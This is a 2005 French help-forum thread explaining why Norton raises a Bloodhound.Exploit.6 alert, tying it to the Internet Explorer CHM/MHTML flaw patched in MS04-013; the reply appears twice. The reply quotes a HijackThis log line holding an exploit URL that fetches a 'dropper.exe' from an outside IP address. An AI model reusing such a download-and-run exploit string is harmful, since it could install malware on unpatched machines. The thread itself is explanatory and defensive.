Bloodhound exploit 6
Résolu/Fermé
Halala
Messages postés
795
Date d'inscription
vendredi 4 mars 2005
Statut
Membre
Dernière intervention
14 novembre 2011
-
28 avril 2005 à 11:01
Halala Messages postés 795 Date d'inscription vendredi 4 mars 2005 Statut Membre Dernière intervention 14 novembre 2011 - 28 avril 2005 à 15:26
Halala Messages postés 795 Date d'inscription vendredi 4 mars 2005 Statut Membre Dernière intervention 14 novembre 2011 - 28 avril 2005 à 15:26
A voir également:
- Bloodhound exploit 6
- Belote a 6 - Forum Loisirs / Divertissements
- Freebox etape 6 ✓ - Forum Freebox
- Triez la liste comme sur cette illustration (attention, on ne voit que le début …). quel est le mot formé par les 6 dernières lettres de la colonne code ? - Forum Excel
- Le fichier contient une liste de prénoms. triez ce tableau par ordre alphabétique des prénoms. quel mot est formé par les 6 premières lettres de la colonne code ? - Forum Bureautique
- Nero 6 - Télécharger - Gravure
2 réponses
salut halala
Il m'est arrivé il ya quelques temps la meme chose.
Ces alertes avaient lieux chaques fois que je faisais un copier/coller dans wordpad d'un bout de log hijackthis posté sur ce forum.
Notamment sur ce type de lignes:
O16 - DPF: {11120607-1001-1111-1000-110199901123} - ms-its:mhtml:file://C:\foo.mht!http:$$63.217.31.72/d1//xxx.chm::/dropper.exe
Impossible de coller ce type de ligne dans wordpad,à chaque fois norton
m'envois une alerte bloodhound 6.
Après de multiples scan AV, anti-troyens etc..qui se sont tous révélés négatifs, c'est en cherchant chez symantec que j'ai trouvé la raison de ses alertes.
Bloodhound.Exploit.6 est une détection heuristique pour des exploits d'une vulnérabilité de Microsoft Internet Explorer(et une de plus..). Cette vulnérabilité a été découverte en février 2004.
La vulnérabilité résulte de la manipulation incorrecte des dossiers de HTML incorporés dans des dossiers de CHM. (CHM est le format Microsoft-compilé d'aide de HTML.)
http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html
"Elle pourrait être exploitées par un attaquant afin de télécharger puis exécuter un fichier malicieux sur une machine vulnérable via une simple page HTML. Cette faille se situe au niveau du traitement des fichiers d'aide .chm, elle est actuellement exploitée par un trojan "Ibiza.A"(et maintenant coolwebsearch) qui s'installent automatiquement sur une machine vulnérable sans même l'intervention de l'utilisateur (sur simple visite d'une page html malicieuse).
http://www.k-otik.com/bugtraq/bulletins/69
En fait chaques fois que norton détecte se type de code, que se soit dans un lien hypertexte vérolé, page web ou sur un site qui traite du sujet(sur la page de k-otik si dessus par exemple), il envois une alerte.
Crosoft a sorti un patch depuis avril:
http://www.microsoft.com/france/technet/securite/info/info.asp?mar=/france/technet/securite/info/ms04-013.html
Donc logiquement (enfin j'espère..),si windows est à jours et que norton aboie au sujet de bloodhound 6, il n'y a pas lieu de trop s'inquiéter, c'est juste l'AV (detection heuristique) qui fait son boulot.
a+
Il m'est arrivé il ya quelques temps la meme chose.
Ces alertes avaient lieux chaques fois que je faisais un copier/coller dans wordpad d'un bout de log hijackthis posté sur ce forum.
Notamment sur ce type de lignes:
O16 - DPF: {11120607-1001-1111-1000-110199901123} - ms-its:mhtml:file://C:\foo.mht!http:$$63.217.31.72/d1//xxx.chm::/dropper.exe
Impossible de coller ce type de ligne dans wordpad,à chaque fois norton
m'envois une alerte bloodhound 6.
Après de multiples scan AV, anti-troyens etc..qui se sont tous révélés négatifs, c'est en cherchant chez symantec que j'ai trouvé la raison de ses alertes.
Bloodhound.Exploit.6 est une détection heuristique pour des exploits d'une vulnérabilité de Microsoft Internet Explorer(et une de plus..). Cette vulnérabilité a été découverte en février 2004.
La vulnérabilité résulte de la manipulation incorrecte des dossiers de HTML incorporés dans des dossiers de CHM. (CHM est le format Microsoft-compilé d'aide de HTML.)
http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html
"Elle pourrait être exploitées par un attaquant afin de télécharger puis exécuter un fichier malicieux sur une machine vulnérable via une simple page HTML. Cette faille se situe au niveau du traitement des fichiers d'aide .chm, elle est actuellement exploitée par un trojan "Ibiza.A"(et maintenant coolwebsearch) qui s'installent automatiquement sur une machine vulnérable sans même l'intervention de l'utilisateur (sur simple visite d'une page html malicieuse).
http://www.k-otik.com/bugtraq/bulletins/69
En fait chaques fois que norton détecte se type de code, que se soit dans un lien hypertexte vérolé, page web ou sur un site qui traite du sujet(sur la page de k-otik si dessus par exemple), il envois une alerte.
Crosoft a sorti un patch depuis avril:
http://www.microsoft.com/france/technet/securite/info/info.asp?mar=/france/technet/securite/info/ms04-013.html
Donc logiquement (enfin j'espère..),si windows est à jours et que norton aboie au sujet de bloodhound 6, il n'y a pas lieu de trop s'inquiéter, c'est juste l'AV (detection heuristique) qui fait son boulot.
a+
Halala
Messages postés
795
Date d'inscription
vendredi 4 mars 2005
Statut
Membre
Dernière intervention
14 novembre 2011
109
28 avril 2005 à 14:36
28 avril 2005 à 14:36
OK moe...T'es un pro...;-)
Je me suis pas inquiété, vu les mises à jour et les protections que j'ai...pas de souci...
Mais sur ce site là, çà me paraissait tout de même étrange...
Norton est trop zélé...lolll
Donc, pas de souci, CE SITE EST SAIN ! !
Merci et @+...
Je me suis pas inquiété, vu les mises à jour et les protections que j'ai...pas de souci...
Mais sur ce site là, çà me paraissait tout de même étrange...
Norton est trop zélé...lolll
Donc, pas de souci, CE SITE EST SAIN ! !
Merci et @+...
28 avril 2005 à 15:26
Halala...çà l'fait pas...mais çà va l'faire...